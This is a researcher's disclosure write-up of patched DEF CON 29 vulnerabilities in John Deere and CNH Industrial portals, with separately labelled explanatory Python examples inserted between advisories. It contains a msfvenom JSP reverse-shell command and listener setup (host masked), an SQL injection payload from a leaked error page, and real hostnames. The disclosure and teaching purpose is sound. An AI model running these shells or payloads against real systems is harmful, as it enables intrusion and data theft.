Over the weekend we presented the work of a group of researchers who decided to “just have a look” at how agriculture companies are implementing “tech” in their industry.
The research, also known as “ethical hacking”, was done for free over the course of six months.
During that time we met dozens of unique people, some deep within the industry, who provided amazing insight into what we should expect while doing this research. And they know who they are! We even met some who have worked at John Deere, as well as at partners or competitors in the space.
All in all, they had some very interesting observations and, while they did not directly participate, many were able to point us in directions that might be “vulnerable to a cyber attack”. While often overlooked, security within Food & Agriculture is one of the most important pieces of global supply chain security.
And so we “audited” some agriculture companies and present to you the most relevant or interesting vulnerabilities we found. Boring, development-domain or zero-impact vulnerabilities have been omitted.
Below you will find all the vulnerabilities we found in these two companies, plus some which did not make it into the DEF CON talk at the time of recording. I have listed all of the advisories we presented at DEF CON 29 and reported to each vendor, John Deere and Case New Holland (CNH Industrial), directly. All of these are patched (from public networks), and with the fantastic assistance of ICS-CERT we were able to help these companies fix their systems. I encourage anyone who discovers major or even minor vulnerabilities, and has trouble contacting legacy companies or emerging tech, to reach out to ICS-CERT, as they are extremely agile and responsive to potential national security issues: https://us-cert.cisa.gov/ics
And here are all the vulnerabilities (in chronological order of discovery)!
SICK-2021-038 John Deere Account Portal – DOM Based XSS in forgetUser?TARGET=
A Cross-site Scripting (XSS) vulnerability in the reset-password function of the John Deere Account Portal allows a remote unauthenticated attacker to execute DOM-based XSS attacks via the forgetUser?TARGET= argument.
SICK-2021-039 John Deere Account Portal – DOM Based XSS in registration?SRC=
A Cross-site Scripting (XSS) vulnerability in the registration function of the John Deere Account Portal allows a remote unauthenticated attacker to execute DOM-based XSS attacks via the registration?SRC= argument.
SICK-2021-040 John Deere Account Portal – DOM Based XSS in com.deere.u90950.webregistration.view.servlets.StandardRegistrationAddServlet?EM_MandatoryPhone=
A Cross-site Scripting (XSS) vulnerability in the registration function of the John Deere Account Portal allows a remote unauthenticated attacker to execute DOM-based XSS attacks via the com.deere.u90950.webregistration.view.servlets.StandardRegistrationAddServlet?EM_MandatoryPhone= argument.
SICK-2021-041 John Deere Account Portal – multiple DOM Based XSS in https://registration.deere.com
A Cross-site Scripting (XSS) vulnerability in the registration function of the John Deere Account Portal allows a remote unauthenticated attacker to execute DOM-based XSS attacks via the SignInServlet page.
SICK-2021-042 John Deere HTTP Request Smuggling vulnerabilities in qual.contest.deere.com, adds-eu.deere.com, admin.qual.contest.deere.com
An HTTP request smuggling vulnerability in John Deere qual.contest.deere.com, adds-eu.deere.com, admin.qual.contest.deere.com subdomains allows a remote unauthenticated attacker to bypass front-end security controls.
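The mechanism behind an advisory like SICK-2021-042, as an added example that is not part of the original advisory: a front end that frames requests by Content-Length and a back end that frames them by Transfer-Encoding carve the same TCP stream into different HTTP requests (the classic CL.TE case), which is how a smuggled prefix slips past front-end access controls. The request bytes and the host name below are constructed for illustration, not captured from any Deere system.

```python
"""Added example, not from the original advisory: one CL.TE request as seen by a
Content-Length parser (front end) and by a chunked parser (back end).  Request
bytes and host name are constructed."""

# Constructed CL.TE request.  Content-Length (32) covers the whole remainder of
# the stream; a chunked parser stops at the "0" chunk and treats the rest as the
# start of a new request.
SMUGGLED = (
    b"POST /search HTTP/1.1\r\n"
    b"Host: example.test\r\n"            # hypothetical host
    b"Content-Length: 32\r\n"
    b"Transfer-Encoding: chunked\r\n"
    b"\r\n"
    b"0\r\n"
    b"\r\n"
    b"GET /admin HTTP/1.1\r\n"           # smuggled prefix, never seen by the front end
    b"Foo: x"
)


def split_head(data):
    """Split one request into (request line, lowercase header dict, remaining bytes),
    or None when the header block has not been fully received yet."""
    head, sep, rest = data.partition(b"\r\n\r\n")
    if not sep:
        return None
    lines = head.split(b"\r\n")
    headers = {}
    for line in lines[1:]:
        name, _, value = line.partition(b":")
        headers[name.strip().lower().decode()] = value.strip().decode()
    return lines[0].decode(), headers, rest


def parse_content_length(data):
    """Front-end style: honour Content-Length and ignore Transfer-Encoding."""
    request_line, headers, rest = split_head(data)
    n = int(headers.get("content-length", "0"))
    return [(request_line, rest[:n])], rest[n:]


def read_chunked(rest):
    """Decode a chunked body; return (body, bytes after the terminating chunk)."""
    body = b""
    while True:
        size_line, _, rest = rest.partition(b"\r\n")
        size = int(size_line.split(b";")[0], 16)   # ignore chunk extensions
        if size == 0:
            _, _, rest = rest.partition(b"\r\n")   # skip the empty trailer line
            return body, rest
        body += rest[:size]
        rest = rest[size + 2:]                     # drop the chunk's trailing CRLF


def parse_transfer_encoding(data):
    """Back-end style: honour chunked encoding.  Returns (complete requests,
    pending bytes).  The pending bytes are the smuggled prefix: the back end
    keeps waiting for the rest of that request, and the next client's request
    on the same connection completes it."""
    messages, pending = [], b""
    while data:
        parts = split_head(data)
        if parts is None:
            pending = data
            break
        request_line, headers, rest = parts
        if headers.get("transfer-encoding", "").lower() == "chunked":
            body, rest = read_chunked(rest)
        else:
            n = int(headers.get("content-length", "0"))
            body, rest = rest[:n], rest[n:]
        messages.append((request_line, body))
        data = rest
    return messages, pending


def cl_te_conflict(data):
    """The check a front end should make: a request carrying both framing headers
    ought to be rejected or normalised (RFC 7230 section 3.3.3), not framed silently."""
    parts = split_head(data)
    if parts is None:
        return False
    headers = parts[1]
    return "content-length" in headers and "transfer-encoding" in headers
```

Running both parsers over `SMUGGLED` shows the split: the Content-Length view is a single POST whose body holds all 32 remaining bytes, while the chunked view is a POST with an empty body followed by a dangling `GET /admin` that the next client's request will complete. The fix on the front end is `cl_te_conflict`, i.e. refusing ambiguous framing rather than picking one header.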
SICK-2021-043 John Deere Pega service kms.deere.com affected by CVE-2021-27653
A default misconfiguration of the Pega Chat Access Group portal in John Deere's Pega Platform 7.4.0 – 8.5.x installation leads to unintended data exposure, allowing download of mission-critical data.
Proof of Concept
SICK-2021-044 John Deere MachineBook (for on-site demonstrations using company equipment) publicly accessible and vulnerable to SQL injection.
The administration panel of John Deere MachineBook (internal-use only) was publicly accessible and allowed SQL injection, giving a remote unauthenticated attacker access to the database containing employee data and machine data.
The GET parameter 'eqid' appears to be 'MySQL >= 5.0.12 AND time-based blind (query SLEEP)' injectable
SICK-2021-045 unrelated to Deere
SICK-2021-046 John Deere public-facing Axiom API health page. CWE-419: Unprotected Primary Channel
An Unprotected Primary Channel vulnerability in the John Deere https://apiqa.tal.deere.com/platform/health/all page allows a remote unauthenticated attacker to view mission-critical health tests relating to all *.deere.com assets.
SICK-2021-047 John Deere Supplier Invoice: Improper Neutralization of Input During Web Page Generation (‘Cross-site Scripting’) in invoice.view.servlets.EmailLoginServlet & view.servlets.SelectPOServlet
A DOM-based XSS vulnerability in the John Deere Supplier Invoice Login Servlet and Purchase Order Servlet pages allows a remote unauthenticated attacker to execute DOM-based XSS attacks via the Supplier Invoice portal.
An SQL injection vulnerability in the John Deere Supplier Invoice Purchase Order Servlet page allows a remote unauthenticated attacker to inject into the Purchase Order form field; the error response returned contains the executed IBM DB2 SQL query.
We're sorry, there was an application error.
Please contact the Help Desk by phone or email with the Diagnostic Information below.
You may want to print this page as it has important information about the error.
Go back to the page I was viewing
Server Time 2021-04-29 00:56:59.676
Application Name e-Invoice
Application URL /invoice/servlet/com.deere.u90242.invoice.view.servlets.SelectPOServlet
Error Message Offending query is: SELECT COUNT(PO_NUM) TOTAL FROM (SELECT DISTINCT PO_NUM FROM DJDBP01.PURCH_HRZN_PO_DTL WHERE PO_NUM = '1') UNION SELECT * FROM DJDBP01.SM_IND_ORD_HDR --' UNION ALL SELECT DISTINCT PO_NUM FROM DJDBP01.SM_IND_ORD_HDR WHERE PO_NUM = '1') UNION SELECT * FROM DJDBP01.SM_IND_ORD_HDR --' )
Nobody in our team knows how to use IBM DB2, which was initially released in 1983.
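What the error page above actually shows, as an added example that is not part of the original advisory: the purchase-order number is spliced twice into a string-built query, so a value that closes the quote breaks the statement and the application echoes the failing SQL back. This rebuilds that query shape against an in-memory SQLite database standing in for IBM DB2 (the two table names are taken from the error page, the rows are constructed) and puts it beside the same query with bound parameters. The count oracle at the end is the same idea sqlmap reported as time-based blind injection for MachineBook's 'eqid' parameter (SICK-2021-044), with a row count in place of a delay.

```python
"""Added example, not from the original advisory: string-built versus parameterised
versions of the SelectPOServlet query, run against SQLite as a stand-in for DB2.
Table names come from the error page; rows are constructed."""
import sqlite3

# The shape of the query from the error page: the PO number appears in both halves.
TEMPLATE = (
    "SELECT COUNT(PO_NUM) TOTAL FROM ("
    "SELECT DISTINCT PO_NUM FROM PURCH_HRZN_PO_DTL WHERE PO_NUM = '{po}' "
    "UNION ALL SELECT DISTINCT PO_NUM FROM SM_IND_ORD_HDR WHERE PO_NUM = '{po}')"
)

# The payload quoted in the error page, minus the DJDBP01 schema prefix that
# does not exist in SQLite.
PAYLOAD_LEAK = "1') UNION SELECT * FROM SM_IND_ORD_HDR --"


def make_db():
    """Constructed stand-in for the DB2 tables named in the error page."""
    db = sqlite3.connect(":memory:")
    db.executescript(
        "CREATE TABLE PURCH_HRZN_PO_DTL (PO_NUM TEXT);"
        "CREATE TABLE SM_IND_ORD_HDR (PO_NUM TEXT, CUSTOMER TEXT);"
        "INSERT INTO PURCH_HRZN_PO_DTL VALUES ('1'), ('2');"
        "INSERT INTO SM_IND_ORD_HDR VALUES ('1', 'acme'), ('3', 'globex');"
    )
    return db


def count_po_vulnerable(db, po):
    """String concatenation, as the servlet evidently did.  The original
    application echoed the failing SQL to the browser; emulate that so the
    leak is visible in the return value."""
    sql = TEMPLATE.format(po=po)
    try:
        return db.execute(sql).fetchone()[0]
    except sqlite3.Error as exc:
        return f"Offending query is: {sql} ({exc})"


def count_po_safe(db, po):
    """Same query with '?' placeholders: the driver sends the value separately,
    so quotes, parentheses and comment markers in it are just characters."""
    sql = TEMPLATE.replace("'{po}'", "?")
    return db.execute(sql, (po, po)).fetchone()[0]


def count_oracle(count_fn, db, base="1"):
    """Boolean-blind probe: if a true and a false condition appended to the same
    value give different results, input reaches the SQL unescaped.  Time-based
    blind (SLEEP) works the same way with response time instead of a count."""
    true_case = count_fn(db, f"{base}' OR '1'='1")
    false_case = count_fn(db, f"{base}' AND '1'='2")
    return true_case != false_case
```

With the page's payload the concatenated query becomes `... WHERE PO_NUM = '1') UNION SELECT * FROM SM_IND_ORD_HDR --...`, a UNION with mismatched column counts, and the emulated error page hands back the full statement including the second table name. The parameterised version returns a count of 0 for the same input and never errors, and `count_oracle` reports True for the vulnerable function and False for the safe one.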
SICK-2021-049 John Deere supplier support portal supportportaldevr14.deere.com/axis affected by Apache Axis RCE CVE-2019-0227
A Remote Code Execution (RCE) vulnerability in the John Deere supplier support portal supportportaldevr14.deere.com/axis, which was affected by the Apache Axis RCE CVE-2019-0227.
# Generate the JSP reverse shell used as the RCE proof of concept
msfvenom -p java/jsp_shell_reverse_tcp LHOST=xxxx LPORT=xxxx -f raw -o rce-poc.jsp
# Catch the callback in msfconsole; LHOST/LPORT must match the values baked into the payload
use exploit/multi/handler
set payload java/jsp_shell_reverse_tcp
set LHOST xxxx
set LPORT xxxx
run
SICK-2021-050 Case New Holland (CNH) exposed JavaMelody monitoring server at painel360.cnhindustrial.com
An exposed JavaMelody monitoring server at Case New Holland (CNH) painel360.cnhindustrial.com allows an unauthenticated remote attacker to view the session data of all current website users, including authentication cookies, full name, HTML contents of the page currently being viewed, IP address, location, user ID number and session count. With those cookies an attacker can log in as any user currently using the website.
SICK-2021-051 Case New Holland (CNH) Azure username enumeration vulnerability in euapidevportpwbapp02.azurewebsites.net/api/auth?email= (with first-name and last-name lookup)
A username enumeration vulnerability in the Case New Holland (CNH) Azure username API https://euapidevportpwbapp02.azurewebsites.net/api/auth?email= allows an unauthenticated remote attacker to see the user ID number, permission level, user roles, username, first name and last name of any known user of the CNH portal, exposing critical PII.
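An e-mail lookup endpoint of the kind described in SICK-2021-051, as an added example that is not CNH's code: first the leaky unauthenticated form, where the status code alone confirms whether an address is registered and a hit returns the whole record, then one way to harden it, requiring a service token and answering identically for known and unknown addresses. The user records, e-mail addresses, token and the hardened design are all assumptions made for the example.

```python
"""Added example, not from the original advisory: a leaky e-mail lookup beside a
hardened one, plus the harvesting loop an attacker runs against the leaky one.
Records, addresses and the token are constructed."""
import hashlib
import hmac

USERS = {  # constructed sample records, shaped like the fields the advisory lists
    "alice@example.test": {"id": 1001, "permission": "admin", "roles": ["dealer-admin"],
                           "username": "asmith", "first_name": "Alice", "last_name": "Smith"},
    "bob@example.test": {"id": 1002, "permission": "user", "roles": ["dealer-viewer"],
                         "username": "bjones", "first_name": "Bob", "last_name": "Jones"},
}

CANDIDATES = ["alice@example.test", "nobody@example.test", "bob@example.test"]  # attacker's guesses


def auth_lookup_leaky(email):
    """As described in the advisory: no caller authentication, a full PII record
    on a hit and a 404 on a miss, so each response confirms or denies the address."""
    user = USERS.get(email.strip().lower())
    if user is None:
        return {"status": 404, "body": {"error": "user not found"}}
    return {"status": 200, "body": dict(user)}


# Only a hash of the expected service token is held; compared in constant time.
_TOKEN_HASH = hashlib.sha256(b"constructed-service-token").digest()


def _token_valid(token):
    if not token:
        return False
    return hmac.compare_digest(hashlib.sha256(token.encode()).digest(), _TOKEN_HASH)


def auth_lookup_hardened(email, bearer_token=None):
    """Hardened variant (an assumed design): a service token is required, and the
    response is the same whether or not the address exists.  The matched record
    is used only server-side, e.g. to decide where a sign-in link goes."""
    if not _token_valid(bearer_token):
        return {"status": 401, "body": {"error": "authentication required"}}
    _user = USERS.get(email.strip().lower())   # consumed internally, never returned
    return {"status": 202,
            "body": {"message": "If the address is registered, a sign-in link has been sent."}}


def harvest(lookup, candidates):
    """What an attacker does: feed guesses and group them by response class
    (status code plus the set of body keys).  Any endpoint that yields more
    than one class is an enumeration oracle."""
    classes = {}
    for email in candidates:
        resp = lookup(email)
        key = (resp["status"], tuple(sorted(resp["body"])))
        classes.setdefault(key, []).append(email)
    return classes


def is_enumerable(lookup, candidates):
    return len(harvest(lookup, candidates)) > 1
```

Against the leaky function the three guesses fall into two classes (200 with the PII keys for the two real users, 404 for the rest), so the attacker walks away with both records. Against the hardened function every guess lands in one class, with or without a valid token, so the same loop learns nothing.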
SICK-2021-052 Case New Holland (CNH) exposed Sidekiq server 3.2.12 at be-staging-nzqq.cnhindustrial.com/sidekiq
An exposed Sidekiq web UI (Sidekiq 3.2.12) at Case New Holland (CNH) be-staging-nzqq.cnhindustrial.com/sidekiq, holding the data-synchronization queues for cnhi-nz-rails-server & cnhi-nz-rails-server-uat, allows an unauthenticated remote attacker to manipulate internal job queues.
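A check for the class of exposure behind SICK-2021-050 and SICK-2021-052 (operational consoles reachable without authentication), as an added example that is not part of the original advisories: it fingerprints a response as an open JavaMelody or Sidekiq console and only reports a 200 page carrying the console's own markers, so a redirect to a login page or a 401/403 is not a finding. The default paths and page markers are assumptions about those products, the sample responses are constructed, and `probe()` is the part you would aim at a host you are authorised to test.

```python
"""Added example, not from the original advisories: fingerprinting unauthenticated
JavaMelody and Sidekiq consoles.  Paths and markers are assumptions about those
products; sample bodies are constructed."""
import urllib.error
import urllib.request

CONSOLES = {
    # name: (paths to try, strings expected on an unauthenticated console page)
    "javamelody": (["/monitoring"], ["JavaMelody"]),
    "sidekiq": (["/sidekiq", "/sidekiq/queues"], ["Sidekiq"]),
}

# Constructed sample responses for the self-test below.
SAMPLE_JAVAMELODY = "<html><head><title>JavaMelody monitoring</title></head><body>Sessions</body></html>"
SAMPLE_SIDEKIQ = "<html><head><title>Sidekiq</title></head><body><a href='/sidekiq/queues'>Queues</a></body></html>"
SAMPLE_LOGIN = "<html><head><title>Sign in</title></head><body><form action='/login'></form></body></html>"


def classify(path, status, body):
    """Return the console name if (path, status, body) looks like an open console.
    Anything other than a 200 (login redirects, 401, 403) counts as not exposed."""
    if status != 200:
        return None
    for name, (paths, markers) in CONSOLES.items():
        if any(path.rstrip("/").endswith(p) for p in paths) and any(m in body for m in markers):
            return name
    return None


class _NoRedirect(urllib.request.HTTPRedirectHandler):
    """Do not follow 3xx: a redirect to a login page must stay a 3xx, not become
    a 200 login page that might be mis-read."""

    def redirect_request(self, req, fp, code, msg, headers, newurl):
        return None   # makes urlopen raise HTTPError for the 3xx


_opener = urllib.request.build_opener(_NoRedirect)


def probe(base_url, timeout=5):
    """Fetch each candidate path on base_url and return (console, url, status)
    for every page classify() accepts.  Network errors are skipped silently."""
    findings = []
    for name, (paths, _markers) in CONSOLES.items():
        for path in paths:
            url = base_url.rstrip("/") + path
            try:
                with _opener.open(url, timeout=timeout) as resp:
                    status = resp.getcode()
                    body = resp.read(65536).decode("utf-8", "replace")
            except urllib.error.HTTPError as err:
                status, body = err.code, ""
            except (urllib.error.URLError, OSError):
                continue
            if classify(path, status, body) == name:
                findings.append((name, url, status))
    return findings
```

The rule worth keeping from this is the negative case: a console that answers a redirect or a 401 is doing its job, and only a 200 that renders the console itself is the finding reported in the two advisories above.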